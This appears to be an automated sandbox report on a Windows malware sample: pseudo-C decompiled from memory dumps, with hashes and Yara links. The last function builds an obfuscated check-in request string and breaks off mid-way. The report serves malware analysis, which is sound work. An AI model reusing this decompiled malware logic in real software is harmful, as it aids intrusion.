0x6e052661
0x6e052661
0x6e052663
0x6e052692
0x6e052699
0x00000000
0x6e052699
0x6e052667
0x6e052668
0x6e05266a
0x6e05266c
0x6e05266c
0x6e05266e
0x6e052670
0x6e052672
0x6e052686
0x6e052686
0x6e052689
0x6e05268b
0x6e05268b
0x6e05268c
0x6e05268c
0x00000000
0x6e052674
0x6e052674
0x6e052674
0x6e05267d
0x6e05267e
0x6e052680
0x6e052682
0x6e052682
0x00000000
0x6e052674
0x6e052672
0x6e05264e
0x6e052655
0x6e052655
0x6e052657
0x00000000
0x00000000
0x6e052659
0x6e05265a
0x6e05265d
0x6e05265f
0x00000000
0x00000000
0x00000000
0x6e05265f
0x00000000
0x6e052655
0x6e0525d8
0x6e0525db
0x6e0525e0
0x00000000
0x00000000
0x6e0525e9
0x6e0525eb
0x6e0525f1
0x00000000
0x00000000
0x6e0525f7
0x6e0525fd
0x00000000
0x00000000
0x6e052603
0x6e052605
0x6e05260e
0x6e052612
0x00000000
0x00000000
0x6e052618
0x6e05261b
0x6e05261d
0x00000000
0x00000000
0x6e052624
0x6e052626
0x00000000
0x00000000
0x6e052628
0x6e05262c
0x00000000
0x00000000
0x00000000
0x6e05262c
0x00000000
0x00000000
0x00000000
0x6e052517
0x6e052517
0x6e052517
0x6e05251e
0x00000000
0x00000000
0x6e052520
0x6e052521
0x6e052523
0x00000000
0x00000000
0x00000000
0x6e052523
0x6e05254b
0x6e05254d
0x00000000
0x00000000
0x6e05255d
0x6e05255f
0x6e052561
0x00000000
0x00000000
0x6e052567
0x6e05256e
0x6e05259a
0x6e05259a
0x6e05259c
0x6e05259e
0x6e0525b2
0x6e0525b4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e0525a0
0x6e0525a0
0x6e0525a0
0x6e0525a9
0x6e0525aa
0x6e0525ac
0x6e0525ae
0x6e0525ae
0x00000000
0x6e0525a0
0x6e052570
0x6e052573
0x6e052575
0x6e052587
0x6e052587
0x6e05258a
0x6e05258c
0x6e05258c
0x6e05258d
0x6e05258d
0x6e052593
0x00000000
0x00000000
0x00000000
0x00000000
0x6e052577
0x6e052577
0x6e052577
0x6e05257e
0x00000000
0x00000000
0x6e052580
0x6e052580
0x6e052581
0x00000000
0x00000000
0x00000000
0x6e052581
0x6e052583
0x6e052585
0x6e052598
0x00000000
0x00000000
0x00000000
0x6e052598
0x00000000
0x6e052585
0x6e0524f7
0x6e0524fa
0x6e0524fd
0x00000000
0x00000000
0x6e0524ff
0x6e052501
0x00000000
0x00000000
0x00000000
0x6e052501
0x6e0524c6
0x6e0524c8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E052536

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 2f94c6c16abc242b7db6f56202ed1353552ee9206f1663e5b984268df60000ab
Instruction ID: bfcb9fb096dcbcb68dad5823c24130d290c2334e485ad7bf1816dd02a1dbcd4b
Opcode Fuzzy Hash: 2f94c6c16abc242b7db6f56202ed1353552ee9206f1663e5b984268df60000ab
Instruction Fuzzy Hash: B061E130614603DFEB49CEA9CBA07A973F5EF85394F64842AD816D7384F730D8A2CA51

Uniqueness

Uniqueness Score: -1.00%

Function 00FC81CD, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC81CD(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xfca330; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xfca378 = 1;
										__eflags =  *0xfca378;
										if( *0xfca378 != 0) {
											goto L60;
										}
										_t84 =  *0xfca330; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xfca378 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xfca330 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xfca338 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xfca334 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xfca338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xfca338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xfca378 = 1;
							__eflags =  *0xfca378;
							if( *0xfca378 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xfca338 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xfca338 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xfca378 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xfca338 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xfca330 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xfca338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xfca338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x00fc81d7
0x00fc81da
0x00fc81e0
0x00fc81fe
0x00000000
0x00fc81fe
0x00fc81e8
0x00fc81f1
0x00fc81f7
0x00fc8206
0x00fc8209
0x00fc820c
0x00fc8216
0x00fc8216
0x00fc8218
0x00fc821b
0x00fc821d
0x00fc821d
0x00fc821f
0x00fc8222
0x00000000
0x00000000
0x00fc8224
0x00fc8226
0x00fc828c
0x00fc828c
0x00fc83ea
0x00000000
0x00fc83ea
0x00fc8228
0x00fc8228
0x00fc822c
0x00fc822e
0x00fc822e
0x00fc822e
0x00fc822e
0x00fc8231
0x00fc8232
0x00fc8235
0x00fc8235
0x00fc8239
0x00fc823d
0x00fc824b
0x00fc824b
0x00fc8253
0x00fc8259
0x00fc825b
0x00fc825d
0x00fc826d
0x00fc827a
0x00fc827e
0x00fc8283
0x00fc8285
0x00fc8303
0x00fc8303
0x00fc8287
0x00fc8287
0x00fc8287
0x00fc8305
0x00fc8307
0x00fc83e8
0x00fc83e8
0x00000000
0x00fc830d
0x00fc830d
0x00fc8314
0x00000000
0x00000000
0x00fc831a
0x00fc831e
0x00fc837a
0x00fc837c
0x00fc8384
0x00fc8386
0x00fc8388
0x00000000
0x00000000
0x00fc838a
0x00fc8390
0x00fc8392
0x00fc8394
0x00fc83a9
0x00fc83a9
0x00fc83ab
0x00fc83da
0x00fc83e1
0x00000000
0x00fc83e1
0x00fc83af
0x00fc83b0
0x00fc83b2
0x00fc83b4
0x00fc83b4
0x00fc83b6
0x00fc83b8
0x00fc83ba
0x00fc83ce
0x00fc83ce
0x00fc83d1
0x00fc83d3
0x00fc83d3
0x00fc83d4
0x00fc83d4
0x00000000
0x00fc83bc
0x00fc83bc
0x00fc83bc
0x00fc83c5
0x00fc83c6
0x00fc83c8
0x00fc83ca
0x00fc83ca
0x00000000
0x00fc83bc
0x00fc83ba
0x00fc8396
0x00fc839d
0x00fc839d
0x00fc839f
0x00000000
0x00000000
0x00fc83a1
0x00fc83a2
0x00fc83a5
0x00fc83a7
0x00000000
0x00000000
0x00000000
0x00fc83a7
0x00000000
0x00fc839d
0x00fc8320
0x00fc8323
0x00fc8328
0x00000000
0x00000000
0x00fc8331
0x00fc8333
0x00fc8339
0x00000000
0x00000000
0x00fc833f
0x00fc8345
0x00000000
0x00000000
0x00fc834b
0x00fc834d
0x00fc8356
0x00fc835a
0x00000000
0x00000000
0x00fc8360
0x00fc8363
0x00fc8365
0x00000000
0x00000000
0x00fc836c
0x00fc836e
0x00000000
0x00000000
0x00fc8370
0x00fc8374
0x00000000
0x00000000
0x00000000
0x00fc8374
0x00000000
0x00000000
0x00000000
0x00fc825f
0x00fc825f
0x00fc825f
0x00fc8266
0x00000000
0x00000000
0x00fc8268
0x00fc8269
0x00fc826b
0x00000000
0x00000000
0x00000000
0x00fc826b
0x00fc8293
0x00fc8295
0x00000000
0x00000000
0x00fc82a5
0x00fc82a7
0x00fc82a9
0x00000000
0x00000000
0x00fc82af
0x00fc82b6
0x00fc82e2
0x00fc82e2
0x00fc82e4
0x00fc82e6
0x00fc82fa
0x00fc82fc
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc82e8
0x00fc82e8
0x00fc82e8
0x00fc82f1
0x00fc82f2
0x00fc82f4
0x00fc82f6
0x00fc82f6
0x00000000
0x00fc82e8
0x00fc82b8
0x00fc82b8
0x00fc82bb
0x00fc82bd
0x00fc82cf
0x00fc82cf
0x00fc82d2
0x00fc82d4
0x00fc82d4
0x00fc82d5
0x00fc82d5
0x00fc82db
0x00fc82db
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc82bf
0x00fc82bf
0x00fc82bf
0x00fc82c6
0x00000000
0x00000000
0x00fc82c8
0x00fc82c8
0x00fc82c9
0x00000000
0x00000000
0x00000000
0x00fc82c9
0x00fc82cb
0x00fc82cd
0x00fc82e0
0x00000000
0x00000000
0x00000000
0x00fc82e0
0x00000000
0x00fc82cd
0x00fc823f
0x00fc8242
0x00fc8245
0x00000000
0x00000000
0x00fc8247
0x00fc8249
0x00000000
0x00000000
0x00000000
0x00fc8249
0x00fc820e
0x00fc8210
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00FC827E

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 5bd3c2b7ade9a5566b381ccbf829f7a5f6a44bf8f1945ba5246d606b9a593617
Instruction ID: e93cb58327fcd9d4ee1b0b22214ad27f7fb98158371d1fc7edab2e16d25716cf
Opcode Fuzzy Hash: 5bd3c2b7ade9a5566b381ccbf829f7a5f6a44bf8f1945ba5246d606b9a593617
Instruction Fuzzy Hash: C561C931A00A979FDB25CB28CB9AF6933A1EB957A4B24813DD816C7190EF31DC43A644

Uniqueness

Uniqueness Score: -1.00%

Function 6E052264, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6E052264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6E0523CB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6E052485(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6E052370(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6E0523CB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6E052467(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6e052268
0x6e052269
0x6e05226a
0x6e05226d
0x6e05226f
0x6e052272
0x6e052273
0x6e052275
0x6e052276
0x6e052277
0x6e05227a
0x6e052284
0x6e052335
0x6e05233c
0x6e052345
0x6e05228a
0x6e05228a
0x6e052290
0x6e052296
0x6e052299
0x6e05229c
0x6e0522a0
0x6e0522a5
0x6e0522aa
0x6e05232a
0x00000000
0x6e0522ac
0x6e0522ac
0x6e0522b8
0x6e0522ba
0x6e052315
0x6e052315
0x6e05231b
0x00000000
0x6e0522bc
0x6e0522cb
0x6e0522cd
0x6e0522ce
0x6e0522cf
0x6e0522d2
0x6e0522d2
0x6e0522d4
0x00000000
0x6e0522d6
0x6e0522d6
0x6e052320
0x6e0522d8
0x6e0522d8
0x6e0522dc
0x6e0522e4
0x6e0522e9
0x6e0522ee
0x6e0522fa
0x6e052302
0x6e052309
0x6e05230f
0x6e052313
0x00000000
0x6e052313
0x6e0522d6
0x6e0522d4
0x00000000
0x6e0522ba
0x6e05232e
0x6e05232e
0x6e05232e
0x6e0522aa
0x6e05234a
0x6e052351

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 8a1957b3c98d4e1a37ec10318b85517cda047920874bba1a166f723e1c171560
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 2621B676900205DFCB00DFA8C980AABBBB9FF49350F4585A8D9159B345D730FA25CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC7FA8, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00FC7FA8(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00FC8113(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00FC81CD(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00FC80B8(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00FC8113(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00FC81AF(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x00fc7fac
0x00fc7fad
0x00fc7fae
0x00fc7fb1
0x00fc7fb3
0x00fc7fb6
0x00fc7fb7
0x00fc7fb9
0x00fc7fba
0x00fc7fbb
0x00fc7fbe
0x00fc7fc8
0x00fc8079
0x00fc8080
0x00fc8089
0x00fc7fce
0x00fc7fce
0x00fc7fd4
0x00fc7fda
0x00fc7fdd
0x00fc7fe0
0x00fc7fe4
0x00fc7fe9
0x00fc7fee
0x00fc806e
0x00000000
0x00fc7ff0
0x00fc7ff0
0x00fc7ffc
0x00fc7ffe
0x00fc8059
0x00fc8059
0x00fc805f
0x00000000
0x00fc8000
0x00fc800f
0x00fc8011
0x00fc8012
0x00fc8013
0x00fc8016
0x00fc8016
0x00fc8018
0x00000000
0x00fc801a
0x00fc801a
0x00fc8064
0x00fc801c
0x00fc801c
0x00fc8020
0x00fc8028
0x00fc802d
0x00fc8032
0x00fc803e
0x00fc8046
0x00fc804d
0x00fc8053
0x00fc8057
0x00000000
0x00fc8057
0x00fc801a
0x00fc8018
0x00000000
0x00fc7ffe
0x00fc8072
0x00fc8072
0x00fc8072
0x00fc7fee
0x00fc808e
0x00fc8095

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: c05beb010244e71865e2905d419aa017dd5c0e6fa9e82817ba30775de42974b2
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: AF21A7729002059FCB10EF68CD82E67B7A5BF443A0F09855DDD158B245DB30F91AD7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E09F83C, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1182830756.000000006E09F000.00000040.00020000.sdmp, Offset: 6E09F000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: cd0bda911afd517f1e9e3aeba0c3b18d9ed253ce7f38a8fd3335d8759b6d5ebc
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: 3D0145333142428FD788CF6DD994E7EBBE8EBC6360B65807EE402C3615D238E446E520

Uniqueness

Uniqueness Score: -1.00%

Function 6E09F443, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1182830756.000000006E09F000.00000040.00020000.sdmp, Offset: 6E09F000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1813b20754f63850370f296089f33479170be5c3db20c3fcd4cbcb0174fb5e75
Instruction ID: c179b1b33c1c414372bb5a7efb4172863f7963045f50e074cfbcd01fb30aef0c
Opcode Fuzzy Hash: 1813b20754f63850370f296089f33479170be5c3db20c3fcd4cbcb0174fb5e75
Instruction Fuzzy Hash: 18F03771240200AFC754CF99C8D0EA277EDEB88364B298058A908CB312C378EC02DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6124, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 220
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00FC6124(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0xfca290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0xfca018; // 0x785c6176
					asm("bswap eax");
					_t32 =  *0xfca014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0xfca010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0xfca00c; // 0x67522d90
					asm("bswap eax");
					_t35 =  *0xfca2d0; // 0x292d5a8
					_t2 = _t35 + 0xfcb622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d14c, _t34, _t33, _t32, _t31,  *0xfca02c,  *0xfca004, _t110);
					_t38 = E00FC271A();
					_t39 =  *0xfca2d0; // 0x292d5a8
					_t3 = _t39 + 0xfcb662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0xfca2d0; // 0x292d5a8
						_t7 = _t92 + 0xfcb66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E00FC2956(_t99);
					_t44 =  *0xfca2d0; // 0x292d5a8
					_t9 = _t44 + 0xfcb38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0xfca2d0; // 0x292d5a8
					_t11 = _t48 + 0xfcb33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0xfca328; // 0x38f95b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0xfca2d0; // 0x292d5a8
						_t13 = _t88 + 0xfcb685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0xfca37c; // 0x38f9630
